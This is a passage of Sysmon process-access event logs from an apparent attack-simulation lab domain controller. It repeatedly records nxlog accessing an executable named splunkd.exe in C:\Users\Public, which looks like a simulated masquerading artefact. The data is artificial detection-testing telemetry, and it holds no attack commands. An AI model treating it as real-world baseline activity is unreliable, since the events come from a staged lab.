T4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8172,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8173,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.997\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.997","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.997\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.997","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:40.997\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1336-5F25-0000-001009500C00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:40.997","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1336-5F25-0000-001009500C00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:41.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:41.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:42.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:42.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:43.701\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:43.701","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:44.716\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 